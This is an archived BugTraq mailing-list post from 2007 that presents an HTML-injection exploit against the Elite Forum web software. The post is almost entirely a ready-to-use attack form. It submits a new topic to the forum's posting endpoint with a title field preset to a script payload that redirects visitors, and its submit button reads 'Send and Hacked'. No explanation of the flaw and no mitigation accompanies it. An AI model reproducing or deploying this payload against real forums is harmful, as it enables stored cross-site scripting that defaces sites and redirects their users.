BugTraq
Elite Forum Full HTML ENject versin 1.0.0.0 Jul 20 2007 07:02AM
starext msn com
c0ded: St@rExT
From : Turkey
exploit:

<title>Elite Forum FULL HTML ENjocter-By St@rEXT</title>
<style>
body{background:url(http://img523.imageshack.us/img523/7704/turkeyflag0x
uhz9zc7uf0.jpg);
color:#FFFFFF;
font-weight:bold;}
input{
background-color:darkred;
color:#FFFFFF;
font-weight:bold;
}
</style
<form method=POST action="http://site/path/index.php?act=ptopic&fid=1" target=_blank>
<b><em><h2><b>Elite Forum FULL HTML ENjocter-By St@rEXT</b></h2></em></b></font>
<br>

<b>Your HTML C0de : <br></b>
<input size="60" type="text" name="title" value='<script>location="http://yourindex.html"</script>'>

<BR><BR><BR><b>Forum Messages:</b><BR>

<input cols=2 rows=1 name='post'value='Bug On!!!'><BR><BR><br>
<input type=submit value="Send and Hacked">
<BR><BR>

<BR><BR><BR>
</form>

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus